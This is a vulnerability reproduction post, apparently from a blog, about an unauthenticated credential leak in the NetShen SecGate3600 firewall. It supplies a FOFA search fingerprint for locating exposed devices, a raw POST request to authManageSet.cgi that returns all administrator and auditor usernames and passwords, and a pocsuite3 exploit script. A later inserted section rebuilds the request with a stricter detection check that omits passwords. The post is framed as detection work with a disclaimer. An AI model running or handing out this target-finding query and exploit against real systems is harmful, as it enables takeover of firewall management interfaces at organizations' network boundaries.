Vulnerability reproduction: NetShen SecGate3600 firewall sensitive information leakage vulnerability (with detection script)

Disclaimer

The vulnerability discussed in this article has been fixed, and sensitive information has been redacted. The article is shared for experience exchange only and is not to be used for any other purpose. Unauthorized attacks are illegal! Sensitive information in the article has been redacted at multiple levels. The user is responsible for any direct or indirect consequences and losses caused by the dissemination and use of the information provided here; the author bears no responsibility for them.

Vulnerability description

The NetShen SecGate3600 firewall is a firewall product built to counter both traditional network attacks and advanced threats. It is widely deployed at the business network boundary of government agencies, enterprises and other organizations to provide security-domain isolation, fine-grained access control and advanced threat detection. Its authManageSet.cgi interface has a sensitive information leakage vulnerability: an unauthenticated attacker can call it to obtain the usernames and passwords of administrator, auditor and other accounts, and then log in to the management backend with them.

FOFA query

sec_gate_image/button_normal.gif

PoC

The request below, sent without any session cookie, asks the user-management CGI for the complete account list:

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Fri, 23 Aug 2013 11:17:08 GMT
Content-Type: application/x-www-form-urlencoded
 
type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

PoC script

The script is written for the pocsuite3 framework.

# _*_ coding:utf-8 _*_
# @Time : 2023/12/16
# @Author: 炼金术师诸葛亮
# Run with: pocsuite -r <this file> -u http://target/ --verify
from pocsuite3.api import Output, POCBase, register_poc, requests, logger


class SecGate3600_information_leakage(POCBase):
    vulID = '0'
    version = '1.0'
    author = '炼金术师诸葛亮'
    createDate = '2023-12-16'
    updateDate = '2023-12-16'
    name = 'NetShen SecGate3600 firewall sensitive information leakage vulnerability'
    appName = 'NetShen SecGate3600'
    vulType = 'Information Disclosure'
    pocDesc = '''NetShen SecGate3600 firewall sensitive information leakage vulnerability:
    the unauthenticated authManageSet.cgi interface returns the account list.'''

    def _verify(self):
        result = {}
        # self.url is normalised by pocsuite3; strip a trailing slash so the path joins cleanly
        url = self.url.rstrip('/') + '/cgi-bin/authUser/authManageSet.cgi'

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'If-Modified-Since': 'Fri, 23 Aug 2013 11:17:08 GMT',
            "Content-Type": "application/x-www-form-urlencoded"
        }

        # jqGrid-style parameters from the PoC; rows=-1 asks for every account, not one page
        data = 'type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc'

        try:
            # firewall management UIs usually carry a self-signed certificate, hence verify=False
            response = requests.post(url, headers=headers, data=data, timeout=10, verify=False)
        except Exception as e:
            logger.error('request to %s failed: %s' % (url, e))
            return self.parse_output(result)

        # loose match from the original PoC: HTTP 200 and the body contains "id"
        if response.status_code == 200 and 'id' in response.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['PostData'] = data

        return self.parse_output(result)

    def _attack(self):
        # the leak is read-only, so attack mode is the same request as verify
        return self._verify()


register_poc(SecGate3600_information_leakage)
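The script above decides "vulnerable" on `'id' in response.text`, which any HTML page containing the letters "id" (a login form with `id="username"`, say) also satisfies. The following added example, which is not part of the original post or of any NetShen code, rebuilds the PoC request with the standard library and replaces that check with one that parses the response. It assumes the CGI answers with a jqGrid-style JSON object of the form `{"rows": [...]}`; the page does not show the real response, so that schema, the row field names, and both sample bodies are constructed for illustration.

```python
import json
import ssl
import time
from urllib.parse import urlencode
from urllib.request import Request, urlopen

ENDPOINT = "/cgi-bin/authUser/authManageSet.cgi"


def build_request(base_url):
    """Rebuild the PoC request. The parameters are the jqGrid ones from the PoC;
    only nd (a client-side cache-buster timestamp) is regenerated per call."""
    params = {
        "type": "getAllUsers",
        "_search": "false",
        "nd": str(int(time.time() * 1000)),
        "rows": "-1",        # -1 asks the grid backend for every row, not one page
        "page": "1",
        "sidx": "",
        "sord": "asc",
    }
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "close",
    }
    return base_url.rstrip("/") + ENDPOINT, headers, urlencode(params)


def naive_check(status_code, body):
    """The check the pocsuite script uses: any 200 whose body contains "id" passes."""
    return status_code == 200 and "id" in body


def extract_user_rows(body):
    """Parse the body as an assumed jqGrid-style JSON object {"rows": [...]}.
    Returns the list of row dicts, or [] when the body is not such an object."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, dict) or not isinstance(data.get("rows"), list):
        return []
    return [row for row in data["rows"] if isinstance(row, dict)]


def row_username(row):
    """Best-effort account name from a row: a named field, else the first grid cell
    (assumed layout; real field names may differ)."""
    for key in ("username", "name", "user"):
        if isinstance(row.get(key), str) and row[key]:
            return row[key]
    cells = row.get("cell")
    if isinstance(cells, list) and cells and isinstance(cells[0], str):
        return cells[0]
    return None


def is_vulnerable(status_code, body):
    """Stricter verdict: HTTP 200 and at least one parsed row carrying an account name.
    A login page or a generic error page cannot satisfy this."""
    if status_code != 200:
        return False
    return any(row_username(r) for r in extract_user_rows(body))


def leaked_accounts(body):
    """Account names only, for the finding report. Passwords are deliberately never
    copied out of the response: the report should prove exposure, not store secrets."""
    return [n for n in (row_username(r) for r in extract_user_rows(body)) if n]


def probe(base_url, timeout=10):
    """Send the request and return (status_code, body). Authorized targets only."""
    url, headers, data = build_request(base_url)
    req = Request(url, data=data.encode(), headers=headers, method="POST")
    ctx = ssl._create_unverified_context()  # management UIs usually use self-signed certs
    with urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")


# Constructed sample bodies, not captured from a real device.
LEAKED_BODY = json.dumps({"page": 1, "total": 1, "records": 2, "rows": [
    {"id": "1", "cell": ["admin", "REDACTED", "administrator"]},
    {"id": "2", "cell": ["audit", "REDACTED", "auditor"]}]})
LOGIN_PAGE = '<html><form><input id="username" name="username"></form></html>'

if __name__ == "__main__":
    print("login page: naive =", naive_check(200, LOGIN_PAGE), "strict =", is_vulnerable(200, LOGIN_PAGE))
    print("leaked body: strict =", is_vulnerable(200, LEAKED_BODY), "accounts =", leaked_accounts(LEAKED_BODY))
```

Running the file shows the two checks disagreeing on the login page: the naive one reports it as vulnerable, the parsed one does not. If the real device's JSON layout differs from the assumed one, `extract_user_rows` and `row_username` are the only two functions that need adjusting.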

Running the script

Source: blog.csdn.net/jjjj1029056414/article/details/135034932